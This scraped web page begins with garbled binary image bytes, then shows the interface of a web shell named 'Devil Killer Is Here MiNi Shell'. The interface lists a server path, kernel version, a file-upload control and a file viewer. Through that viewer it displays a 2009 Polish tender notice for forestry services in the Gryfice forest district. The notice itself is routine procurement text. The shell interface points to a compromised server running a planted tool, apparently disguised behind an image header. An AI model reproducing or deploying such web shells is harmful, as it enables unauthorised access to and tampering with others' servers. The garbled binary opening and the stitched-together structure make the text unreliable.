JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/23415-N-2009.html

<p class="kh_header"><b>Gryfice: Wykonanie usług leśnych w Nadleśnictwie Gryfice w 2009 roku - II przetarg</b><br>
<b>Numer ogłoszenia: 23415 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Gryfice , Osada Zdrój 1, 72-300 Gryfice, tel. 091 3843321; 3842516.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zarządzający własnością Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług leśnych w Nadleśnictwie Gryfice w 2009 roku - II przetarg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wielkość zamówienia przekracza 133.000,00 euro. Przedmiot zamówienia jest podzielony na 4 następujące części, zwane pakietami, tj.:
Pakiet nr 1, L-ctwo Raduń, Szkółka Leśna -  Wykonanie usług z zakresu gospodarki leśnej w Leśnictwie Raduń oraz wykonanie usługi z zakresu gospodarki leśnej w gospodarstwie szkółkarskim;
Pakiet nr 2, L-ctwo Niczonów, L-ctwo Pobierowo - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Niczonów i Pobierowo;
Pakiet nr 3, L-ctwo Świerzno, L-ctwo Chomino - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno i Chomino;
Pakiet nr 4, PAD - Wykonanie usługi z zakresu ochrony p.poż., obsługa punktu Alarmowo Dyspozycyjnego w siedzibie Nadleśnictwa Gryfice..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy ubiegający się o udzielenie zamówienia zobowiązani są wnieść wadium w następujących kwotach:
1. Pakiet nr 1, L-ctwo Raduń, Szkółka -  Wykonanie usług z zakresu gospodarki leśnej w Leśnictwie Raduń oraz wykonanie usługi z zakresu gospodarki leśnej w gospodarstwie szkółkarskim - 5359.71 zł;
Pakiet nr 2, L-ctwo Niczonów, L-ctwo Pobierowo - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Niczonów i Pobierowo - 4627.31 zł;
Pakiet nr 3, L-ctwo Świerzno, L-ctwo Chomino - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno i Chomino - 7619.80 zł;
Pakiet nr 4, PAD - Wykonanie usługi z zakresu ochrony p.poż., obsługa punktu Alarmowo Dyspozycyjnego w siedzibie Nadleśnictwa Gryfice - 168.00 zł.
Wadium może być wnoszone wedle wyboru wykonawcy w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych i poręczenia spółdzielczych kas oszczędnościowo - kredytowych, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Bank BGŻ S.A. nr konta: 80 2030 0045 1110 0000 0054 4290. Wadium w formie gotówki nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego (p. 7).
Wadium należy wnieść w terminie do dnia 06.02.2009r. do godz. 09:30. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku zamawiającego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1) 	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2) 	posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; szczegółowe wymogi dotyczące powyższego warunku w odniesieniu do każdego z pakietów określone zostały w pkt 7.2. specyfikacji istotnych warunków zamówienia,
3) 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; szczegółowe wymogi dotyczące powyższego warunku w odniesieniu do każdego z pakietów określone zostały w pkt 7.2. specyfikacji istotnych warunków zamówienia,	
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana odrębnie dla każdego pakietu.
Wykonawca nie spełniający warunków udziału w postępowaniu zostanie wykluczony z postępowania a złożona przez niego oferta będzie traktowana jako oferta odrzucona.
Przez znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, należy rozumieć posiadanie przez Wykonawcę ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej na kwotę:
Pakiet nr 1 co najmniej 50.000,00zł; Pakiet nr 2 co najmniej 50.000,00zł; Pakiet nr 3 co najmniej 50.000,00zł; Pakiet nr 4 co najmniej 10.000,00zł.
Na potwierdzenie spełnienia tego warunku Wykonawca winien załączyć do polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia dziłalności na kwotę: Pakiet nr 1 co najmniej 50.000,00zł; Pakiet nr 2 co najmniej 50.000,00zł; Pakiet nr 3 co najmniej 50.000,00zł; Pakiet nr 4 co najmniej 10.000,00zł.
1. Przez posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy rozumieć wykazanie przez Wykonawcę, iż: 1)	Pakiet nr 1, L-ctwo Raduń, Szkółka Leśna - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwie Raduń oraz wykonanie usługi z zakresu gospodarki leśnej w gospodarstwie szkółkarskim;
a)	posiada doświadczenie polegające na wykonaniu w okresie 3 lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie co najmniej 5 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę miesięcznie nie mniejszą niż 15.000,00 zł każda;
b)	dysponuje lub będzie dysponował osobami w ilości i z uprawnieniami pozwalającymi w sposób prawidłowy wykonać zamówienie;
c)	dysponuje lub będzie dysponował narzędziami i urządzeniami niezbędnymi do prawidłowego wykonania zamówienia; 
2)	Pakiet nr 2, L-ctwo Niczonów, L-ctwo Pobierowo - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Niczonów i Pobierowo;
a)	posiada doświadczenie polegające na wykonaniu w okresie 3 lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie co najmniej 5 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę miesięcznie nie mniejszą niż 15.000,00 zł każda;
b)	dysponuje lub będzie dysponował osobami w ilości i z uprawnieniami pozwalającymi w sposób prawidłowy wykonać zamówienie;
c)	dysponuje lub będzie dysponował narzędziami i urządzeniami niezbędnymi do prawidłowego wykonania zamówienia; 
3)	Pakiet nr 3, L-ctwo Świerzno, L-ctwo Chomino - Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno i Chomino;
a)	posiada doświadczenie polegające na wykonaniu w okresie 3 lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie co najmniej 5 prac polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna, na kwotę miesięcznie nie mniejszą niż 15.000,00 zł każda;
b)	dysponuje lub będzie dysponował osobami w ilości i z uprawnieniami pozwalającymi w sposób prawidłowy wykonać zamówienie;
c)	dysponuje lub będzie dysponował narzędziami i urządzeniami niezbędnymi do prawidłowego wykonania zamówienia; 
4)	Pakiet nr 4, PAD - Wykonanie usługi z zakresu ochrony p.poż., obsługa punktu Alarmowo Dyspozycyjnego w siedzibie Nadleśnictwa Gryfice:	
dysponuje lub będzie dysponował osobami w ilości i z uprawnieniami pozwalającymi w sposób prawidłowy wykonać zamówienie.
Ocena spełnienia opisanych wyżej warunków udziału w postępowaniu zostanie dokonana w oparciu o dokumenty złożone przez wykonawcę wraz z ofertą, tj.: 
- wykazu usług wykonanych przez wykonawcę w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie (wg wzoru - załącznik nr 4 SIWZ) wraz 
z dokumentami potwierdzającymi, iż usługi określone w załączniku nr 4 zostały wykonane należycie (np.: referencje, protokoły odbioru robót, faktury, wydruki z Systemu Informatycznego Lasów Państwowych o nazwie (Karta Konta Wierzyciela) itp). 
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez wykonawcę usługi zostały wykonane należycie zawierały, co najmniej:
a)	wskazanie podmiotu na rzecz, którego były realizowane,
b)	wskazanie, że wykonawca realizował usługi, których dokumenty dotyczą,
c)	wskazanie miejsca wykonania,
d)	wskazanie zakresu i wartości wykonanej usługi
e)	wskazanie daty wykonania (rozpoczęcia i zakończenia),
oraz opinię podmiotu wskazanego powyżej lit a) stwierdzającą, że usługi zostały wykonane należycie.
- wykazu osób (wg wzoru - załącznik nr 5 SIWZ), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
- pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli Wykonawca skożystał z takiego udostępnienia. 
- zaświadczenia o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej) dla osób wskazanych w wykazie osób (załącznik nr 5 SIWZ) - dotyczy pakietu od nr 1 do nr 3 , 
- wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (wg wzoru - załącznik nr 6 SIWZ),
- pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli Wykonawca skorzystał z takiego udostępnienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ocena spełnienia warunków w postępowaniu zostanie dokonana w oparciu o dokumenty złożone przez wykonawcę wraz z ofertą. Na potwierdzenie warunków udziału w postępowaniu Wykonawca zobowiązany jest przedłożyć następujące dokumenty:
1)	oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu (wg wzoru - załącznik nr 2 SIWZ),
2)	aktualny odpis z Krajowego Rejestru Sądowego - rejestru przedsiębiorców albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4)	aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
5)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;	
informacja z Krajowego Rejestru Karnego o której mowa w niniejszym punkcie powinna zostać złożona dla:
-	w przypadku osób fizycznych (osób prowadzących działalność na podstawie wpisu do ewidencji działalności gospodarczej) - dla nich samych,
-	w przypadku osób prowadzących działalność w formie spółki cywilnej - dla każdego ze wspólników,
-	w przypadku spółek jawnych - dla każdego ze wspólników,
-	w przypadku osób prawnych - dla każdego z członków organu zarządzającego,
6)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, potwierdzającą, iż na podmioty zbiorowe ubiegające się o udzielenie zamówienia sąd nie orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary. Obowiązek złożenia informacji, o której mowa w niniejszym pkt dotyczy jedynie osób prawnych oraz handlowych spółek osobowych. Informacji tej nie przedkładają wykonawcy będący osobami fizycznymi, oraz gdy prowadzą działalność w formie spółki cywilnej.
7)	wykaz usług wykonanych przez wykonawcę w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności gospodarczej jest krótszy - w tym okresie (wg wzoru - załącznik nr 4 SIWZ) wraz 
z dokumentami potwierdzającymi, iż usługi określone w załączniku nr 4 SIWZ zostały wykonane należycie (np.: referencje, protokoły odbioru robót, faktury, wydruki z Systemu Informatycznego Lasów Państwowych o nazwie (Karta Konta Wierzyciela) itp). 
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez wykonawcę usługi zostały wykonane należycie zawierały, co najmniej:
a)	wskazanie podmiotu na rzecz, którego były realizowane,
b)	wskazanie, że wykonawca realizował usługi, których dokumenty dotyczą,
c)	wskazanie miejsca wykonania,
d)	wskazanie zakresu i wartości wykonanej usługi
e)	wskazanie daty wykonania (rozpoczęcia i zakończenia),
oraz opinię podmiotu wskazanego powyżej lit a) stwierdzającą, że usługi zostały wykonane należycie.
8)	wykaz osób (wg wzoru - załącznik nr 5 SIWZ), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia 
9)	pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 7.3 ppkt 8  niniejszej specyfikacji istotnych warunków zamówienia, wykonawca wskazał osoby, którymi będzie dysponował,
10)	zaświadczenia o odbyciu z wynikiem pozytywnym szkolenia uprawniającego do pracy z użyciem pilarki (§ 21 rozporządzenia Ministra Środowiska z dnia 24 sierpnia 2006 r. w sprawie bezpieczeństwa i higieny pracy przy wykonywaniu niektórych prac z zakresu gospodarki leśnej) dla osób wskazanych w wykazie osób (załącznik nr 5 SIWZ) - dotyczy pakietu od nr 1 do nr 3 , 
11)	wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca (wg wzoru - załącznik nr 6 SIWZ),
12)	pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 7.3 ppkt 11, niniejszej specyfikacji istotnych warunków zamówienia, wykonawca wskazał urządzenia, którymi będzie dysponował,
13)	polisę potwierdzającą, że wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana odrębnie dla każdego pakietu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szczecin.lasy.gov.pl/gryfice.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Gryfice, Osada Zdrój 1, 72-300 Gryfice, tel. (091)3843321, fax (091) 3877165, email: gryfice@szczecin.lasy.gov.pl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 09:50, miejsce: Nadleśnictwo Gryfice, Osada Zdrój 1, 72-300 Gryfice pok. nr 1..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1, L-ctwo Raduń, Szkółka Leśna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwie Raduń oraz wykonanie usługi z zakresu gospodarki leśnej w gospodarstwie szkółkarskim:
- zagospodarowanie lasu i Szkółka leś. prace ręczne: 
prace ręczne z zakresu zagospodarowania lasu (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka)  w L-ctwie Raduń i na szkółce leśnej, katalogowe i nieskatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych; zakres prac 15326 nh (normogodziny katalogowe), h (godz. zegarowe)
- zagospodarowanie prace mechaniczne:
prace mechaniczne z zakresu zagospodarowania lasu (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka) w L-ctwie Raduń, katalogowe i nieskatalogowane; zakres prac  24 nh (normogodziny katalogowe),h (godz. zegarowe)
- szkółka leśna prace mechaniczne katalogowe:
prace mechaniczne katalogowe na szkółce leśnej; zakres prac 1683 nh (normogodziny katalogowe)
- szkółka leśna prace mechaniczne godz.:
prace mechaniczne nieskatalogowane na szkółce leśne; zakres prac 652 h (godz. zegarowe)
- pozyskanie drewna: 
prace ręczne z zakresu użytkowania lasu w L-ctwie Raduń , katalogowe i nieskatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych; zakres prac 12013 nh (normogodziny katalogowe),h (godz. zegarowe)
- zrywka półpodwieszona, prace mechaniczne, katalogowe, polegające na zrywce drewna W, S1, S3, M1. w L-ctwie Raduń; zakres prac 218 nh (normogodziny katalogowe)
- zrywka nasiębierna,  prace mechaniczne, katalogowe, polegające na nasiębiernej zrywce drewna S2, S4. w L-ctwie Raduń; zakres prac 1610 nh (normogodziny katalogowe)
- zrywka drewna prace godz. nieskatalogowane. w L-ctwie Raduń; zakres prac 10 h (godz. zegarowe)
- prace transportowe, zakres prac 10 h (godz. zegarowe).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2, L-ctwo Niczonów, L-ctwo Pobierowo.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Niczonów i Pobierowo:
- zagospodarowanie lasu prace ręczne: 
prace ręczne z zakresu zagospodarowania lasu (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka) w L-ctwach Niczonów i Pobierowo, katalogowe i nie skatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych; zakres prac 6976 nh (normogodziny katalogowe),h (godz. zegarowe);
- zagospodarowanie prace mechaniczne:
prace mechaniczne z zakresu zagospodarowania lasu (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka) w L-ctwach Niczonów i Pobierowo, katalogowe i nieskatalogowane; zakres prac 145 nh (normogodziny katalogowe),h (godz. zegarowe)
- pozyskanie drewna: 
prace ręczne z zakresu użytkowania lasu w L-ctwach Niczonów i Pobierowo, katalogowe i nieskatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych; zakres prac 18419 nh (normogodziny katalogowe),h (godz. zegarowe)
- zrywka półpodwieszona, 
prace mechaniczne, katalogowe, polegające na zrywce drewna W, S1, S3, M1. w L-ctwach Niczonów i Pobierowo; zakres prac 229 nh (normogodziny katalogowe)
- zrywka nasiębierna, prace mechaniczne, katalogowe, polegające na nasiębiernej zrywce drewna S2, S4. w L-ctwach Niczonów i Pobierowo; zakres prac 1620 nh (normogodziny katalogowe)
- zrywka drewna prace godz. nieskatalogowane. w L-ctwach Niczonów i Pobierowo; zakres prac 10 h (godz. zegarowe)
- prace transportowe; zakres prac 20 h (godz. zegarowe).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3, L-ctwo Świerzno, L-ctwo Chomino.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie usług z zakresu gospodarki leśnej w Leśnictwach Świerzno i Chomino:
- zagospodarowanie lasu prace ręczne: 
prace ręczne z zakresu zagospodarowania (hodowla lasu, ochrona lasu, ochrona przyrody, ochrona p.poż, zadania budżetowe, remonty dróg leśnych, turystyka) w L-ctwach Świerzno i Chomino, katalogowe i nie skatalogowane, wykonywane ręcznie lub ręcznie przy użyciu narzędzi mechanicznych; zakres prac 12570 nh (normogodziny katalogowe),h (godz. zegarowe)
- zagospodarowanie prace mechaniczne: 
